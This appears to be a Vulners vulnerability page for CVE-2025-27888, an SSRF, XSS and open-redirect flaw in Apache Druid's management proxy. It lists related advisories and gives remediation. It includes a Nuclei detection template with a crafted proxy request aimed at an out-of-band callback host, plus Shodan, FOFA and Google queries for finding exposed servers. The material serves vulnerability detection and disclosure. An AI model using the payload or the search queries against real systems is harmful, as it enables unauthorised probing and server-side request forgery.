| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the Apache Druid analytical database lies in the redirection of URLs to an unreliable website. This allows attackers to redirect users to arbitrary URL addresses, execute XSS attacks, or perform SSRF attacks. | 25 Jun 202500:00 | – | bdu_fstec | |
| CVE-2025-27888 | 19 Mar 202517:38 | – | circl | |
| Apache Druid 代码问题漏洞 | 20 Mar 202500:00 | – | cnnvd | |
| CVE-2025-27888 | 20 Mar 202511:29 | – | cve | |
| CVE-2025-27888 Apache Druid: Server-Side Request Forgery and Cross-Site Scripting | 20 Mar 202511:29 | – | cvelist | |
| EUVD-2025-6811 | 3 Oct 202520:07 | – | euvd | |
| Apache Druid vulnerable to Server-Side Request Forgery, Cross-site Scripting, Open Redirect | 20 Mar 202512:32 | – | github | |
| CVE-2025-27888 | 20 Mar 202512:15 | – | nvd | |
| GHSA-2XCR-P767-F3RV Apache Druid vulnerable to Server-Side Request Forgery, Cross-site Scripting, Open Redirect | 20 Mar 202512:32 | – | osv | |
| PT-2025-12331 | 19 Mar 202500:00 | – | ptsecurity |
id: CVE-2025-27888
info:
name: Apache Druid - Server-Side Request Forgery
author: xbow,DhiyaneshDK
severity: high
description: |
Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Apache Druid.This issue affects all previous Druid versions.When using the Druid management proxy, a request that has a specially crafted URL could be used to redirect the request to an arbitrary server instead. This has the potential for XSS or XSRF. The user is required to be authenticated for this exploit. The management proxy is enabled in Druid's out-of-box configuration. It may be disabled to mitigate this vulnerability. If the management proxy is disabled, some web console features will not work properly, but core functionality is unaffected.Users are recommended to upgrade to Druid 31.0.2 or Druid 32.0.1, which fixes the issue.
impact: |
Authenticated attackers can exploit SSRF vulnerabilities through the management proxy to redirect requests to arbitrary servers, potentially enabling XSS, XSRF attacks, or accessing internal services.
remediation: |
Upgrade to Apache Druid version 31.0.2 or 32.0.1, or disable the management proxy to mitigate this vulnerability.
reference:
- https://lists.apache.org/thread/c0qo989pwtrqkjv6xfr0c30dnjq8vf39
- http://www.openwall.com/lists/oss-security/2025/03/19/7
classification:
epss-score: 0.01656
epss-percentile: 0.73755
metadata:
verified: true
max-request: 1
vendor: apache
product: druid
shodan-query: http.title:"apache druid"
fofa-query: title="apache druid"
google-query: intitle:"apache druid"
tags: cve,cve2025,apache,druid,ssrf,oast,oss,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- '{{BaseURL}}/unified-console.html'
matchers:
- type: dsl
dsl:
- 'contains(body, "Apache Druid")'
internal: true
- raw:
- |
GET /proxy/coordinator@{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
# digest: 4b0a00483046022100ff4b0a0f2f6eb647537d44ac4182b2bb4824e196cc1978eb41eedcb6b0384072022100c49379de3c0a52261c37898a6de51256fa1ee7227ac66d147f7958a92d4f846d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation